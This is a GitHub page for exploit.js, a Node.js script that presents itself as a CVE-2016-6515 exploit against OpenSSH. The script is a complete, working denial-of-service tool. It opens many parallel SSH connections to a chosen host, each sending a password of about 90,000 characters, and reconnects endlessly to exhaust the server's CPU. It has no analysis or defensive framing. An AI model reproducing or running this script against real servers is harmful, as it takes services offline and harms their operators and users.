-
Notifications
You must be signed in to change notification settings - Fork 30
/
exploit.js
executable file
·78 lines (67 loc) · 1.54 KB
/
exploit.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#!/usr/bin/env node
/*
* CVE-2016-6515 exploit by opsxcq
*/
var Client = require('ssh2').Client;
var program = require('commander');
function usage(){
console.log("[-] Usage: ./exploit.js -h host -p port -u user");
}
var pattern="AAAAAAAAA";
var buffer="";
for(var i=0; i < 10000; i++){
buffer = buffer + pattern;
}
function exploit(host, port, user){
var conn = new Client();
conn//
.on('end', function() {
// Again
exploit(host, port, user);
})//
.on('close', function(err) {
// Again
if(!err){
exploit(host, port, user);
}
})//
.on('error', function(){
exploit(host, port, user);
}) //
.connect({
host: host,
port: port,
username: user,
password: buffer
});
}
program.version('1.0.0')
.option('-p, --port <n>', 'OpenSSH Port', parseInt)
.option('-u, --user <n>', 'Remote username to try to login')
.option('-h, --host <n>', 'OpenSSH Host')
.option('-i, --instances <n>', 'How many paralel instances',parseInt)
.parse(process.argv);
if (!program.port){
usage();
return -1;
}
if (!program.user){
usage();
return -1;
}
if (!program.host){
usage();
return -1;
}
var instances = 20;
if(program.instances){
instances = program.instances;
}
try{
console.log("[+] Exploiting "+program.host+":"+program.port+" with user "+program.user);
for(var i=0; i < instances; i++){
exploit(program.host, program.port, program.user);
}
}catch(e){
console.log("[-] Exception: "+e);
}